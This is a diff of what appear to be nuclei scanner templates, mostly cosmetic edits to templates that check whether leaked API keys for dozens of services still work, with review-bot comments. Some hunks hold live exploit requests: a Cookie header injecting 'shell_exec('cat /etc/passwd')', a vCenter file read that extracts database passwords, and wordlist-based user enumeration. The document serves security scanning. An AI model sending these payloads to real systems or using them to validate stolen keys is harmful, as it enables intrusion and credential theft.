||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,find,text
|
tags: token-spray,google,find,text
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,distance,matrix
|
tags: token-spray,google,distance,matrix
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,geocode
|
tags: token-spray,google,geocode
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,19 +6,21 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,geolocation
|
tags: token-spray,google,geolocation
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}"
|
- "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}"
|
||||||
matchers-condition: and
|
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
|
negative: true
|
||||||
words:
|
words:
|
||||||
- 'error'
|
- 'error'
|
||||||
negative: true
|
|
||||||
- type: status
|
- type: status
|
||||||
|
negative: true
|
||||||
status:
|
status:
|
||||||
- 404
|
- 404
|
||||||
negative: true
|
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,maps,embed
|
tags: token-spray,google,maps,embed
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,maps,embed
|
tags: token-spray,google,maps,embed
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,search,nearby
|
tags: token-spray,google,search,nearby
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,roads
|
tags: token-spray,google,roads
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,place,details
|
tags: token-spray,google,place,details
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,places,photo
|
tags: token-spray,google,places,photo
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,playable,locations
|
tags: token-spray,google,playable,locations
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,route
|
tags: token-spray,google,route
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,speed,limit
|
tags: token-spray,google,speed,limit
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,maps
|
tags: token-spray,google,maps
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,streetview
|
tags: token-spray,google,streetview
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,timezone
|
tags: token-spray,google,timezone
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,search,places,text
|
tags: token-spray,google,search,places,text
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
@ -14,6 +15,6 @@ requests:
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
|
negative: true
|
||||||
words:
|
words:
|
||||||
- 'error_message'
|
- 'error_message'
|
||||||
negative: true
|
|
||||||
|
|
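Review bot: The word matcher in the second hunk (`@ -14,6 +15,6 @@`) is negative-only, so the template reports a working key for any response whose body lacks `error_message`. That includes an empty body, an HTML error page or a proxy block page. Pairing it with a positive signal under `matchers-condition: and`, for example a `- type: status` matcher on `200`, would cut those false positives. The matchers list may continue past the end of the hunk, so confirm no such check already exists.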
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,heroku
|
tags: token-spray,heroku
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
path:
|
path:
|
||||||
|
@ -17,9 +18,9 @@ requests:
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
|
condition: or
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
- 201
|
- 201
|
||||||
- 202
|
- 202
|
||||||
- 206
|
- 206
|
||||||
condition: or
|
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,hubspot
|
tags: token-spray,hubspot
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,instagram,graph
|
tags: token-spray,instagram,graph
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,ipstack
|
tags: token-spray,ipstack
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,iterable
|
tags: token-spray,iterable
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,jumpcloud
|
tags: token-spray,jumpcloud
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,lokalise
|
tags: token-spray,lokalise
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,loqate
|
tags: token-spray,loqate
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,mailchimp
|
tags: token-spray,mailchimp
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
network:
|
network:
|
||||||
- inputs:
|
- inputs:
|
||||||
- data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n"
|
- data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n"
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,mailgun
|
tags: token-spray,mailgun
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,mapbox
|
tags: token-spray,mapbox
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,newrelic,nerdgraph
|
tags: token-spray,newrelic,nerdgraph
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,node,npm,package,manager
|
tags: token-spray,node,npm,package,manager
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,weather,openweather
|
tags: token-spray,weather,openweather
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,pagerduty
|
tags: token-spray,pagerduty
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,pendo
|
tags: token-spray,pendo
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,pivotaltracker
|
tags: token-spray,pivotaltracker
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,postmark
|
tags: token-spray,postmark
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,sendgrid
|
tags: token-spray,sendgrid
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
network:
|
network:
|
||||||
- inputs:
|
- inputs:
|
||||||
- data: "ehlo\r\n"
|
- data: "ehlo\r\n"
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,slack
|
tags: token-spray,slack
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,sonarcloud
|
tags: token-spray,sonarcloud
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,spotify
|
tags: token-spray,spotify
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,square
|
tags: token-spray,square
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,stripe
|
tags: token-spray,stripe
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,tinypng
|
tags: token-spray,tinypng
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,travis
|
tags: token-spray,travis
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,twitter
|
tags: token-spray,twitter
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,visualstudio,microsoft
|
tags: token-spray,visualstudio,microsoft
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,wakatime
|
tags: token-spray,wakatime
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,weglot
|
tags: token-spray,weglot
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,17 +7,19 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,youtube
|
tags: token-spray,youtube
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}"
|
- "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}"
|
||||||
matchers-condition: or
|
|
||||||
|
|
||||||
|
matchers-condition: or
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- 'quotaExceeded'
|
- 'quotaExceeded'
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
|
@ -16,10 +16,9 @@ requests:
|
||||||
Accept: application/json, text/plain, */*
|
Accept: application/json, text/plain, */*
|
||||||
Referer: {{BaseURL}}
|
Referer: {{BaseURL}}
|
||||||
|
|
||||||
|
threads: 50
|
||||||
payloads:
|
payloads:
|
||||||
user: helpers/wordlists/user-list.txt
|
user: helpers/wordlists/user-list.txt
|
||||||
attack: sniper
|
|
||||||
threads: 50
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
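Review bot: With `attack: sniper` removed, this request no longer states its attack type and depends on the engine default. The same removal is made in the next section (the `uid` payload) and in the `vcdb.properties` template further down. Each of these has a single payload set, so the behaviour should be unchanged, but a short comment next to `payloads:` such as `# single payload set; engine default attack type applies` would make the reliance explicit. The request block starts and ends outside the hunk.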
|
@ -15,10 +15,9 @@ requests:
|
||||||
Accept: application/json, text/plain, */*
|
Accept: application/json, text/plain, */*
|
||||||
Referer: {{BaseURL}}
|
Referer: {{BaseURL}}
|
||||||
|
|
||||||
|
threads: 50
|
||||||
payloads:
|
payloads:
|
||||||
uid: helpers/wordlists/numbers.txt
|
uid: helpers/wordlists/numbers.txt
|
||||||
attack: sniper
|
|
||||||
threads: 50
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -12,6 +12,8 @@ requests:
|
||||||
- "{{BaseURL}}"
|
- "{{BaseURL}}"
|
||||||
headers:
|
headers:
|
||||||
Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
|
Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
|
||||||
|
|
||||||
|
skip-variables-check: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
|
|
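Review bot: `skip-variables-check: true` is added with no comment explaining it, and the key switches off the engine's unresolved-variable check for this request. It appears to be needed because the `Cookie` header carries a literal `{{shell_exec(...)}}` expression meant for the target rather than a nuclei variable. A one-line comment above the key would record that, e.g. `# Cookie contains a literal {{...}} expression, not a nuclei variable`. The request block starts before the hunk and the matchers continue after it.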
|
@ -33,7 +33,7 @@ requests:
|
||||||
--01b28e152ee044338224bf647275f8eb
|
--01b28e152ee044338224bf647275f8eb
|
||||||
Content-Disposition: form-data; name="email"
|
Content-Disposition: form-data; name="email"
|
||||||
|
|
||||||
test@{{randstr.tld}}
|
test@{{randstr}}.tld
|
||||||
--01b28e152ee044338224bf647275f8eb
|
--01b28e152ee044338224bf647275f8eb
|
||||||
Content-Disposition: form-data; name="editid"
|
Content-Disposition: form-data; name="editid"
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
GET /eam/vib?id=§path§\vcdb.properties HTTP/1.1
|
GET /eam/vib?id={{path}}\vcdb.properties HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
payloads:
|
payloads:
|
||||||
|
@ -20,14 +20,13 @@ requests:
|
||||||
- "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008)
|
- "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008)
|
||||||
- "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions
|
- "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions
|
||||||
- "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0
|
- "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0
|
||||||
attack: sniper
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- "(?m)^(driver|dbtype|password(\\.encrypted)?)\\s="
|
- "(?m)^(driver|dbtype|password(\\.encrypted)?)\\s="
|
||||||
part: body
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|